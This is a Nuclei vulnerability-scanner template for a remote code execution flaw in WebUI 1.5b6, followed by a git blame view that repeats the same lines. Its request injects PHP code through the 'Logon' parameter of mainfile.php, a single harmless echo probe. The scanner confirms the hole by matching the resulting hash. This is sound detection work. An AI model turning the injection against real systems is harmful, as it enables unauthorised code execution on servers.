nuclei-templates/vulnerabilities/other/webui-rce.yaml

id: webui-rce
info:
  name: WebUI 1.5b6 RCE
  author: pikpikcu
  severity: critical
  description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
  reference: https://www.exploit-db.com/exploits/36821
  tags: webui,rce


requests:
  - method: GET
    path:
      - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c5b3d7397a90f42d222f7ed9408c0dc6"
        part: body

      - type: status
        status:
          - 200
adding tags 2021-02-19 08:21:21 +00:00			`id: webui-rce`
Create cisco-webui-rce.yaml 2021-02-19 07:39:32 +00:00			`info:`
adding tags 2021-02-19 08:21:21 +00:00			`name: WebUI 1.5b6 RCE`
Create cisco-webui-rce.yaml 2021-02-19 07:39:32 +00:00			`author: pikpikcu`
			`severity: critical`
Add description 2021-10-25 09:54:49 +00:00			`description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.`
adding tags 2021-02-19 08:21:21 +00:00			`reference: https://www.exploit-db.com/exploits/36821`
			`tags: webui,rce`

Create cisco-webui-rce.yaml 2021-02-19 07:39:32 +00:00
			`requests:`
			`- method: GET`
			`path:`
adding tags 2021-02-19 08:21:21 +00:00			`- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'`
Create cisco-webui-rce.yaml 2021-02-19 07:39:32 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
adding tags 2021-02-19 08:21:21 +00:00			`- "c5b3d7397a90f42d222f7ed9408c0dc6"`
Create cisco-webui-rce.yaml 2021-02-19 07:39:32 +00:00			`part: body`

			`- type: status`
			`status:`
adding tags 2021-02-19 08:21:21 +00:00			`- 200`